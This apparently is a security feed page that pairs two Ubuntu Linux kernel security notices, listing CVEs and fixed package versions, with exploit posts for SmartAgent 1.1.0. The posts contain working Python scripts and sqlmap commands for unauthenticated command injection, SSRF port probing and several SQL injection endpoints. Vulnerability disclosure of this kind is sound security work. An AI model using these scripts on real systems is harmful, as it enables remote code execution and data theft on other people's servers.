Ubuntu Security Notice 7089-1 - Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7089-1November 01, 2024linux, linux-azure-6.8, linux-gcp-6.8, linux-hwe-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-azure-6.8: Linux kernel for Microsoft Azure cloud systems- linux-gcp-6.8: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-6.8: Linux hardware enablement (HWE) kernelDetails:Chenyuan Yang discovered that the USB Gadget subsystem in the Linuxkernel did not properly check for the device to be enabled beforewriting. A local attacker could possibly use this to cause a denial ofservice. (CVE-2024-25741)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM32 architecture;  - MIPS architecture;  - PA-RISC architecture;  - PowerPC architecture;  - RISC-V architecture;  - S390 architecture;  - x86 architecture;  - Cryptographic API;  - Serial ATA and Parallel ATA drivers;  - Null block device driver;  - Bluetooth drivers;  - Cdrom driver;  - Clock framework and drivers;  - Hardware crypto device drivers;  - CXL (Compute Express Link) drivers;  - Cirrus firmware drivers;  - GPIO subsystem;  - GPU drivers;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - Fastrpc Driver;  - Network drivers;  - Microsoft Azure Network Adapter (MANA) driver;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - NVMEM (Non Volatile Memory) drivers;  - PCI subsystem;  - Pin controllers subsystem;  - x86 platform drivers;  - S/390 drivers;  - SCSI drivers;  - Thermal drivers;  - TTY drivers;  - UFS subsystem;  - USB DSL drivers;  - USB core drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Serial drivers;  - VFIO drivers;  - VHOST drivers;  - File systems infrastructure;  - BTRFS file system;  - GFS2 file system;  - JFFS2 file system;  - JFS file system;  - Network file systems library;  - Network file system client;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Memory management;  - Netfilter;  - Tracing infrastructure;  - io_uring subsystem;  - BPF subsystem;  - Core kernel;  - Bluetooth subsystem;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - Network traffic control;  - Sun RPC protocol;  - Wireless networking;  - AMD SoC Alsa drivers;  - SoC Audio for Freescale CPUs drivers;  - MediaTek ASoC drivers;  - SoC audio core drivers;  - SOF drivers;  - Sound sequencer drivers;(CVE-2024-41079, CVE-2024-41058, CVE-2024-41029, CVE-2024-42253,CVE-2024-41075, CVE-2024-42280, CVE-2024-42102, CVE-2024-41055,CVE-2024-41025, CVE-2024-42124, CVE-2024-41060, CVE-2024-41027,CVE-2024-42145, CVE-2024-42146, CVE-2024-42251, CVE-2024-41081,CVE-2024-42065, CVE-2024-42129, CVE-2024-41031, CVE-2024-41035,CVE-2024-41047, CVE-2023-52888, CVE-2024-42248, CVE-2024-41039,CVE-2024-42119, CVE-2024-41038, CVE-2024-42150, CVE-2024-42073,CVE-2024-42089, CVE-2024-41007, CVE-2024-42120, CVE-2024-42069,CVE-2024-41096, CVE-2024-42153, CVE-2024-41012, CVE-2024-42151,CVE-2024-42241, CVE-2024-42126, CVE-2024-42092, CVE-2024-42231,CVE-2024-41032, CVE-2024-41076, CVE-2024-42136, CVE-2024-41078,CVE-2024-41068, CVE-2024-41070, CVE-2024-41091, CVE-2024-42063,CVE-2024-42157, CVE-2024-42118, CVE-2024-41046, CVE-2024-41023,CVE-2024-42094, CVE-2024-41042, CVE-2024-41034, CVE-2024-42096,CVE-2024-42105, CVE-2024-41051, CVE-2024-42239, CVE-2024-42117,CVE-2024-41019, CVE-2024-41033, CVE-2024-42223, CVE-2024-41098,CVE-2024-41052, CVE-2024-41036, CVE-2024-41087, CVE-2024-42115,CVE-2024-41057, CVE-2024-42161, CVE-2024-42240, CVE-2024-41093,CVE-2024-42097, CVE-2024-42077, CVE-2024-41062, CVE-2024-42156,CVE-2024-41077, CVE-2024-42235, CVE-2024-41085, CVE-2023-52887,CVE-2024-42237, CVE-2024-41061, CVE-2024-41073, CVE-2024-42087,CVE-2024-41086, CVE-2024-41044, CVE-2024-41066, CVE-2024-42128,CVE-2024-42144, CVE-2024-42227, CVE-2024-41020, CVE-2024-41015,CVE-2024-42232, CVE-2024-41072, CVE-2024-41030, CVE-2024-42098,CVE-2024-42121, CVE-2024-42080, CVE-2024-41071, CVE-2024-42225,CVE-2024-42064, CVE-2024-42246, CVE-2024-42113, CVE-2024-41082,CVE-2024-42095, CVE-2024-41080, CVE-2024-41056, CVE-2024-42147,CVE-2024-41069, CVE-2024-42135, CVE-2024-42245, CVE-2024-42244,CVE-2024-42271, CVE-2024-41084, CVE-2024-42234, CVE-2024-41064,CVE-2024-42108, CVE-2024-41090, CVE-2024-42079, CVE-2024-42138,CVE-2024-42127, CVE-2024-42149, CVE-2024-41067, CVE-2024-42130,CVE-2024-42086, CVE-2024-41045, CVE-2024-42088, CVE-2024-42131,CVE-2024-41063, CVE-2024-42111, CVE-2024-41088, CVE-2024-42110,CVE-2024-41074, CVE-2024-41041, CVE-2024-39487, CVE-2024-42076,CVE-2024-42091, CVE-2024-42132, CVE-2024-42100, CVE-2024-41010,CVE-2024-42093, CVE-2024-41048, CVE-2024-41059, CVE-2024-42137,CVE-2024-41065, CVE-2024-42067, CVE-2024-42140, CVE-2024-42250,CVE-2024-42084, CVE-2024-42155, CVE-2024-41021, CVE-2024-41089,CVE-2024-42106, CVE-2024-41083, CVE-2024-42112, CVE-2024-42101,CVE-2024-42229, CVE-2024-41053, CVE-2024-42074, CVE-2024-42252,CVE-2024-41018, CVE-2024-41095, CVE-2024-42090, CVE-2024-41097,CVE-2024-42236, CVE-2024-42109, CVE-2024-42158, CVE-2024-43858,CVE-2024-42133, CVE-2024-42066, CVE-2024-41094, CVE-2024-39486,CVE-2024-41050, CVE-2024-41028, CVE-2024-42114, CVE-2024-41049,CVE-2024-42070, CVE-2024-42243, CVE-2024-41092, CVE-2024-43855,CVE-2024-42103, CVE-2024-41022, CVE-2024-42142, CVE-2024-42238,CVE-2024-42152, CVE-2024-41037, CVE-2024-42230, CVE-2024-42082,CVE-2024-42085, CVE-2024-42104, CVE-2024-41017, CVE-2024-41054,CVE-2024-42068, CVE-2024-42141, CVE-2024-42247)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-48-generic    6.8.0-48.48  linux-image-6.8.0-48-generic-64k  6.8.0-48.48  linux-image-generic             6.8.0-48.48  linux-image-generic-64k         6.8.0-48.48  linux-image-generic-64k-hwe-24.04  6.8.0-48.48  linux-image-generic-hwe-24.04   6.8.0-48.48  linux-image-generic-lpae        6.8.0-48.48  linux-image-kvm                 6.8.0-48.48  linux-image-virtual             6.8.0-48.48  linux-image-virtual-hwe-24.04   6.8.0-48.48Ubuntu 22.04 LTS  linux-image-6.8.0-1017-azure    6.8.0-1017.20~22.04.1  linux-image-6.8.0-1017-azure-fde  6.8.0-1017.20~22.04.1  linux-image-6.8.0-1017-gcp      6.8.0-1017.19~22.04.1  linux-image-6.8.0-48-generic    6.8.0-48.48~22.04.1  linux-image-6.8.0-48-generic-64k  6.8.0-48.48~22.04.1  linux-image-azure               6.8.0-1017.20~22.04.1  linux-image-azure-fde           6.8.0-1017.20~22.04.1  linux-image-gcp                 6.8.0-1017.19~22.04.1  linux-image-generic-64k-hwe-22.04  6.8.0-48.48~22.04.1  linux-image-generic-hwe-22.04   6.8.0-48.48~22.04.1  linux-image-oem-22.04           6.8.0-48.48~22.04.1  linux-image-oem-22.04a          6.8.0-48.48~22.04.1  linux-image-oem-22.04b          6.8.0-48.48~22.04.1  linux-image-oem-22.04c          6.8.0-48.48~22.04.1  linux-image-oem-22.04d          6.8.0-48.48~22.04.1  linux-image-virtual-hwe-22.04   6.8.0-48.48~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7089-1  CVE-2023-52887, CVE-2023-52888, CVE-2024-25741, CVE-2024-39486,  CVE-2024-39487, CVE-2024-41007, CVE-2024-41010, CVE-2024-41012,  CVE-2024-41015, CVE-2024-41017, CVE-2024-41018, CVE-2024-41019,  CVE-2024-41020, CVE-2024-41021, CVE-2024-41022, CVE-2024-41023,  CVE-2024-41025, CVE-2024-41027, CVE-2024-41028, CVE-2024-41029,  CVE-2024-41030, CVE-2024-41031, CVE-2024-41032, CVE-2024-41033,  CVE-2024-41034, CVE-2024-41035, CVE-2024-41036, CVE-2024-41037,  CVE-2024-41038, CVE-2024-41039, CVE-2024-41041, CVE-2024-41042,  CVE-2024-41044, CVE-2024-41045, CVE-2024-41046, CVE-2024-41047,  CVE-2024-41048, CVE-2024-41049, CVE-2024-41050, CVE-2024-41051,  CVE-2024-41052, CVE-2024-41053, CVE-2024-41054, CVE-2024-41055,  CVE-2024-41056, CVE-2024-41057, CVE-2024-41058, CVE-2024-41059,  CVE-2024-41060, CVE-2024-41061, CVE-2024-41062, CVE-2024-41063,  CVE-2024-41064, CVE-2024-41065, CVE-2024-41066, CVE-2024-41067,  CVE-2024-41068, CVE-2024-41069, CVE-2024-41070, CVE-2024-41071,  CVE-2024-41072, CVE-2024-41073, CVE-2024-41074, CVE-2024-41075,  CVE-2024-41076, CVE-2024-41077, CVE-2024-41078, CVE-2024-41079,  CVE-2024-41080, CVE-2024-41081, CVE-2024-41082, CVE-2024-41083,  CVE-2024-41084, CVE-2024-41085, CVE-2024-41086, CVE-2024-41087,  CVE-2024-41088, CVE-2024-41089, CVE-2024-41090, CVE-2024-41091,  CVE-2024-41092, CVE-2024-41093, CVE-2024-41094, CVE-2024-41095,  CVE-2024-41096, CVE-2024-41097, CVE-2024-41098, CVE-2024-42063,  CVE-2024-42064, CVE-2024-42065, CVE-2024-42066, CVE-2024-42067,  CVE-2024-42068, CVE-2024-42069, CVE-2024-42070, CVE-2024-42073,  CVE-2024-42074, CVE-2024-42076, CVE-2024-42077, CVE-2024-42079,  CVE-2024-42080, CVE-2024-42082, CVE-2024-42084, CVE-2024-42085,  CVE-2024-42086, CVE-2024-42087, CVE-2024-42088, CVE-2024-42089,  CVE-2024-42090, CVE-2024-42091, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42095, CVE-2024-42096, CVE-2024-42097,  CVE-2024-42098, CVE-2024-42100, CVE-2024-42101, CVE-2024-42102,  CVE-2024-42103, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42108, CVE-2024-42109, CVE-2024-42110, CVE-2024-42111,  CVE-2024-42112, CVE-2024-42113, CVE-2024-42114, CVE-2024-42115,  CVE-2024-42117, CVE-2024-42118, CVE-2024-42119, CVE-2024-42120,  CVE-2024-42121, CVE-2024-42124, CVE-2024-42126, CVE-2024-42127,  CVE-2024-42128, CVE-2024-42129, CVE-2024-42130, CVE-2024-42131,  CVE-2024-42132, CVE-2024-42133, CVE-2024-42135, CVE-2024-42136,  CVE-2024-42137, CVE-2024-42138, CVE-2024-42140, CVE-2024-42141,  CVE-2024-42142, CVE-2024-42144, CVE-2024-42145, CVE-2024-42146,  CVE-2024-42147, CVE-2024-42149, CVE-2024-42150, CVE-2024-42151,  CVE-2024-42152, CVE-2024-42153, CVE-2024-42155, CVE-2024-42156,  CVE-2024-42157, CVE-2024-42158, CVE-2024-42161, CVE-2024-42223,  CVE-2024-42225, CVE-2024-42227, CVE-2024-42229, CVE-2024-42230,  CVE-2024-42231, CVE-2024-42232, CVE-2024-42234, CVE-2024-42235,  CVE-2024-42236, CVE-2024-42237, CVE-2024-42238, CVE-2024-42239,  CVE-2024-42240, CVE-2024-42241, CVE-2024-42243, CVE-2024-42244,  CVE-2024-42245, CVE-2024-42246, CVE-2024-42247, CVE-2024-42248,  CVE-2024-42250, CVE-2024-42251, CVE-2024-42252, CVE-2024-42253,  CVE-2024-42271, CVE-2024-42280, CVE-2024-43855, CVE-2024-43858Package Information:  https://launchpad.net/ubuntu/+source/linux/6.8.0-48.48  https://launchpad.net/ubuntu/+source/linux-azure-6.8/6.8.0-1017.20~22.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-6.8/6.8.0-1017.19~22.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-6.8/6.8.0-48.48~22.04.1

Ubuntu Security Notice USN-7089-1

SmartAgent version 1.1.0 suffers from an unauthenticated remote code execution vulnerability in youtubeInfo.php.

    # Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution# Date: 01-10-2024# Exploit Author: Alter Prime# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com# Version: Build v1.1.0# Tested on: Kali LinuxAn unauthenticated user can access a php script called https://smarts-srlcom.com/youtubeInfo.php from the vulnerable web application and through a POST request with vulnerable parameter "youtubeUrl" a command injection vulnerability could be triggered.Vulnerable code snippet from youtubeInfo.php:"""$youtubeUrl=$_POST["youtubeUrl"];$command = 'youtube-dl -j ' . $youtubeUrl;echo  shell_exec($command);"""Steps To Reproduce:1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0#Python Exploitimport requestsurl = "https://smarts-srlcom.com?youtubeInfo.php"command = input("Enter the command you want to run $EX: id$: ")postdata = {    "youtubeUrl": ";" + command}response = requests.post(url, data=postdata, verify=False)print(response.text)

SmartAgent 1.1.0 Remote Code Execution

SmartAgent version 1.1.0 suffers from a server-side request forgery vulnerability.

    # Exploit Title: SmartAgent v1.1.0 - Server-Side Request Forgery (SSRF)# Date: 01-10-2024# Exploit Author: Alter Prime# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com# Version: Build v1.1.0# Tested on: Kali LinuxAn unauthenticated user can trigger the web server to perform web requests to the localhost via a GET request to the vulnerable script  https://smarts-srlcom.com/FB/getFbVideoSource.php?url=http://127.0.0.1:80.The GET request includes the vulnerable parameter "url".Steps To Reproduce:1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0#Python Exploitimport requestsurl = "https://smartagent.[client].com/FB/getFbVideoSource.php"port = input("Enter the port you want to check: ")parameter = {  "url": "http://127.0.0.1:" + port}response = requests.get(url, data=parameter, verify=False)if response.status_code == 200:    print(f"Port {port} is open on the server")else:    print(f"Port {port} closed")

SmartAgent 1.1.0 Server-Side Request Forgery

SmartAgent version 1.1.0 suffers from multiple unauthenticated remote SQL injection vulnerabilities.

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a POST request to the vulnerable script https://smarts-srlcom.com/privateArea/common/tests/interface.php.

The POST request includes the folowing parameters "action=exportNetworkDate&id=1111" and vulnerable parameter is "id".

Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = "https://smartagent.[client].com/privateArea/common/tests/interface.php"  
sqlcommand = input("Enter the command you want to run $EX: UNION SELECT @@version$: ")

postdata = {  
    "action": "exportNetworkDate",  
  "id": "1111" + sqlcommand  
}

response = requests.post(url, data=postdata, verify=False)  
print(response.text)

2. Alternatively SQLMAP could pe used on the same endpoint 

sqlmap -u https://smartagent.[client].com/privateArea/common/tests/interface.php. --data "action=exportNetworkDate&id=1111" -p "id"

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/privateArea/common/qoe/sendPushManually.php?id=123.

The GET request includes the vulnerable parameter "id".

Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = "https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php"  
sqlcommand = input("Enter the command you want to run $EX: UNION SELECT @@version$: ")

parameter = {  
  "id": "123" + sqlcommand  
}

response = requests.get(url, data=parameter, verify=False)  
print(response.text)

2. Alternatively SQLMAP could pe used on the same endpoint 

sqlmap -u  https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php?id=123 -p "id"

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/recuperaLog.php?client=1111.

The GET request includes the vulnerable parameter "client".

Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = "https://smartagent.[client].com/recuperaLog.php"  
sqlcommand = input("Enter the command you want to run $EX: UNION SELECT @@version$: ")

parameter = {  
  "client": "1111" + sqlcommand  
}

response = requests.get(url, data=parameter, verify=False)  
print(response.text)

2. Alternatively SQLMAP could pe used on the same endpoint 

sqlmap -u https://smartagent.[client].com/recuperaLog.php?client=1111 -p "client"

SmartAgent 1.1.0 SQL Injection

Ubuntu Security Notice 7088-1 - Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7088-1October 31, 2024linux, linux-gcp, linux-gcp-5.4, linux-gkeop, linux-hwe-5.4, linux-ibm,linux-ibm-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systemsDetails:Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linuxkernel contained an integer overflow vulnerability. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2022-36402)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - PowerPC architecture;  - User-Mode Linux (UML);  - x86 architecture;  - Block layer subsystem;  - Cryptographic API;  - Android drivers;  - Serial ATA and Parallel ATA drivers;  - ATM drivers;  - Drivers core;  - CPU frequency scaling framework;  - Device frequency scaling framework;  - GPU drivers;  - HID subsystem;  - Hardware monitoring drivers;  - InfiniBand drivers;  - Input Device core drivers;  - IOMMU subsystem;  - IRQ chip drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - EEPROM drivers;  - VMware VMCI Driver;  - MMC subsystem;  - Network drivers;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - Device tree and open firmware driver;  - Parport drivers;  - PCI subsystem;  - Pin controllers subsystem;  - Remote Processor subsystem;  - S/390 drivers;  - SCSI drivers;  - QCOM SoC drivers;  - Direct Digital Synthesis drivers;  - TTY drivers;  - Userspace I/O drivers;  - DesignWare USB3 driver;  - USB subsystem;  - BTRFS file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFS file system;  - NILFS2 file system;  - BPF subsystem;  - Core kernel;  - DMA mapping infrastructure;  - Tracing infrastructure;  - Radix Tree data structure library;  - Kernel userspace event delivery library;  - Objagg library;  - Memory management;  - Amateur Radio drivers;  - Bluetooth subsystem;  - CAN network layer;  - Networking core;  - Ethtool driver;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - KCM (Kernel Connection Multiplexor) sockets driver;  - MAC80211 subsystem;  - Netfilter;  - Network traffic control;  - SCTP protocol;  - Sun RPC protocol;  - TIPC protocol;  - TLS protocol;  - Wireless networking;  - AppArmor security module;  - Simplified Mandatory Access Control Kernel framework;  - SoC audio core drivers;  - USB sound devices;(CVE-2024-43894, CVE-2024-46737, CVE-2024-46828, CVE-2024-42244,CVE-2024-46723, CVE-2024-41073, CVE-2024-46756, CVE-2024-42288,CVE-2024-46840, CVE-2024-46771, CVE-2024-46757, CVE-2024-43860,CVE-2024-46747, CVE-2024-41017, CVE-2024-42246, CVE-2024-44988,CVE-2024-42281, CVE-2024-36484, CVE-2024-43856, CVE-2024-47668,CVE-2024-46759, CVE-2024-46744, CVE-2024-42289, CVE-2024-42131,CVE-2024-46679, CVE-2024-42304, CVE-2024-46818, CVE-2024-43858,CVE-2024-44960, CVE-2024-45028, CVE-2024-26885, CVE-2024-46676,CVE-2024-46780, CVE-2024-42310, CVE-2024-44987, CVE-2024-41090,CVE-2024-44954, CVE-2024-45026, CVE-2024-42285, CVE-2023-52614,CVE-2024-27051, CVE-2024-43880, CVE-2024-43839, CVE-2024-43884,CVE-2024-42311, CVE-2024-43893, CVE-2024-41072, CVE-2024-41091,CVE-2024-46758, CVE-2024-41022, CVE-2024-46745, CVE-2024-42305,CVE-2024-46673, CVE-2024-42284, CVE-2024-46844, CVE-2024-46677,CVE-2024-45025, CVE-2024-43861, CVE-2024-43914, CVE-2024-46783,CVE-2024-41012, CVE-2024-44999, CVE-2024-44946, CVE-2024-42276,CVE-2024-46740, CVE-2024-42295, CVE-2024-44947, CVE-2024-41059,CVE-2024-26669, CVE-2024-38602, CVE-2024-42306, CVE-2023-52918,CVE-2024-42297, CVE-2024-42229, CVE-2024-43853, CVE-2024-45006,CVE-2024-44998, CVE-2024-42283, CVE-2024-44952, CVE-2024-46761,CVE-2024-43841, CVE-2024-44944, CVE-2024-42313, CVE-2024-45008,CVE-2024-46714, CVE-2024-41065, CVE-2024-43883, CVE-2024-43867,CVE-2024-42286, CVE-2024-43879, CVE-2024-43846, CVE-2024-42280,CVE-2024-43854, CVE-2021-47212, CVE-2024-35848, CVE-2024-41020,CVE-2024-41068, CVE-2024-45021, CVE-2024-41098, CVE-2024-44965,CVE-2024-43890, CVE-2024-45003, CVE-2024-44969, CVE-2024-41011,CVE-2024-46738, CVE-2024-41071, CVE-2024-26800, CVE-2024-46721,CVE-2024-42292, CVE-2024-41081, CVE-2024-44948, CVE-2023-52531,CVE-2024-26891, CVE-2024-26641, CVE-2024-42287, CVE-2024-46722,CVE-2024-41042, CVE-2024-46675, CVE-2024-46743, CVE-2024-42259,CVE-2024-41015, CVE-2024-43908, CVE-2024-46719, CVE-2024-43871,CVE-2024-46739, CVE-2024-42301, CVE-2024-47659, CVE-2024-42271,CVE-2024-26668, CVE-2024-43835, CVE-2024-46829, CVE-2024-47667,CVE-2024-44995, CVE-2024-47669, CVE-2024-38611, CVE-2024-40929,CVE-2024-46815, CVE-2024-43830, CVE-2024-42309, CVE-2024-41063,CVE-2024-46782, CVE-2024-46777, CVE-2024-42265, CVE-2024-46781,CVE-2024-26607, CVE-2024-41064, CVE-2024-46685, CVE-2024-43882,CVE-2024-44935, CVE-2024-46800, CVE-2024-46822, CVE-2024-46755,CVE-2024-46817, CVE-2024-43829, CVE-2024-46798, CVE-2024-46689,CVE-2024-42290, CVE-2024-46750, CVE-2024-26640, CVE-2024-47663,CVE-2024-41070)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1082-ibm      5.4.0-1082.87  linux-image-5.4.0-1102-gkeop    5.4.0-1102.106  linux-image-5.4.0-1139-gcp      5.4.0-1139.148  linux-image-5.4.0-200-generic   5.4.0-200.220  linux-image-5.4.0-200-generic-lpae  5.4.0-200.220  linux-image-5.4.0-200-lowlatency  5.4.0-200.220  linux-image-gcp-lts-20.04       5.4.0.1139.141  linux-image-generic             5.4.0.200.196  linux-image-generic-lpae        5.4.0.200.196  linux-image-gkeop               5.4.0.1102.100  linux-image-gkeop-5.4           5.4.0.1102.100  linux-image-ibm-lts-20.04       5.4.0.1082.111  linux-image-lowlatency          5.4.0.200.196  linux-image-oem                 5.4.0.200.196  linux-image-oem-osp1            5.4.0.200.196  linux-image-virtual             5.4.0.200.196Ubuntu 18.04 LTS  linux-image-5.4.0-1082-ibm      5.4.0-1082.87~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1139-gcp      5.4.0-1139.148~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-200-generic   5.4.0-200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-200-lowlatency  5.4.0-200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-gcp                 5.4.0.1139.148~18.04.1                                  Available with Ubuntu Pro  linux-image-generic-hwe-18.04   5.4.0.200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-ibm                 5.4.0.1082.87~18.04.1                                  Available with Ubuntu Pro  linux-image-lowlatency-hwe-18.04  5.4.0.200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-oem                 5.4.0.200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-oem-osp1            5.4.0.200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-snapdragon-hwe-18.04  5.4.0.200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-virtual-hwe-18.04   5.4.0.200.220~18.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7088-1  CVE-2021-47212, CVE-2022-36402, CVE-2023-52531, CVE-2023-52614,  CVE-2023-52918, CVE-2024-26607, CVE-2024-26640, CVE-2024-26641,  CVE-2024-26668, CVE-2024-26669, CVE-2024-26800, CVE-2024-26885,  CVE-2024-26891, CVE-2024-27051, CVE-2024-35848, CVE-2024-36484,  CVE-2024-38602, CVE-2024-38611, CVE-2024-40929, CVE-2024-41011,  CVE-2024-41012, CVE-2024-41015, CVE-2024-41017, CVE-2024-41020,  CVE-2024-41022, CVE-2024-41042, CVE-2024-41059, CVE-2024-41063,  CVE-2024-41064, CVE-2024-41065, CVE-2024-41068, CVE-2024-41070,  CVE-2024-41071, CVE-2024-41072, CVE-2024-41073, CVE-2024-41081,  CVE-2024-41090, CVE-2024-41091, CVE-2024-41098, CVE-2024-42131,  CVE-2024-42229, CVE-2024-42244, CVE-2024-42246, CVE-2024-42259,  CVE-2024-42265, CVE-2024-42271, CVE-2024-42276, CVE-2024-42280,  CVE-2024-42281, CVE-2024-42283, CVE-2024-42284, CVE-2024-42285,  CVE-2024-42286, CVE-2024-42287, CVE-2024-42288, CVE-2024-42289,  CVE-2024-42290, CVE-2024-42292, CVE-2024-42295, CVE-2024-42297,  CVE-2024-42301, CVE-2024-42304, CVE-2024-42305, CVE-2024-42306,  CVE-2024-42309, CVE-2024-42310, CVE-2024-42311, CVE-2024-42313,  CVE-2024-43829, CVE-2024-43830, CVE-2024-43835, CVE-2024-43839,  CVE-2024-43841, CVE-2024-43846, CVE-2024-43853, CVE-2024-43854,  CVE-2024-43856, CVE-2024-43858, CVE-2024-43860, CVE-2024-43861,  CVE-2024-43867, CVE-2024-43871, CVE-2024-43879, CVE-2024-43880,  CVE-2024-43882, CVE-2024-43883, CVE-2024-43884, CVE-2024-43890,  CVE-2024-43893, CVE-2024-43894, CVE-2024-43908, CVE-2024-43914,  CVE-2024-44935, CVE-2024-44944, CVE-2024-44946, CVE-2024-44947,  CVE-2024-44948, CVE-2024-44952, CVE-2024-44954, CVE-2024-44960,  CVE-2024-44965, CVE-2024-44969, CVE-2024-44987, CVE-2024-44988,  CVE-2024-44995, CVE-2024-44998, CVE-2024-44999, CVE-2024-45003,  CVE-2024-45006, CVE-2024-45008, CVE-2024-45021, CVE-2024-45025,  CVE-2024-45026, CVE-2024-45028, CVE-2024-46673, CVE-2024-46675,  CVE-2024-46676, CVE-2024-46677, CVE-2024-46679, CVE-2024-46685,  CVE-2024-46689, CVE-2024-46714, CVE-2024-46719, CVE-2024-46721,  CVE-2024-46722, CVE-2024-46723, CVE-2024-46737, CVE-2024-46738,  CVE-2024-46739, CVE-2024-46740, CVE-2024-46743, CVE-2024-46744,  CVE-2024-46745, CVE-2024-46747, CVE-2024-46750, CVE-2024-46755,  CVE-2024-46756, CVE-2024-46757, CVE-2024-46758, CVE-2024-46759,  CVE-2024-46761, CVE-2024-46771, CVE-2024-46777, CVE-2024-46780,  CVE-2024-46781, CVE-2024-46782, CVE-2024-46783, CVE-2024-46798,  CVE-2024-46800, CVE-2024-46815, CVE-2024-46817, CVE-2024-46818,  CVE-2024-46822, CVE-2024-46828, CVE-2024-46829, CVE-2024-46840,  CVE-2024-46844, CVE-2024-47659, CVE-2024-47663, CVE-2024-47667,  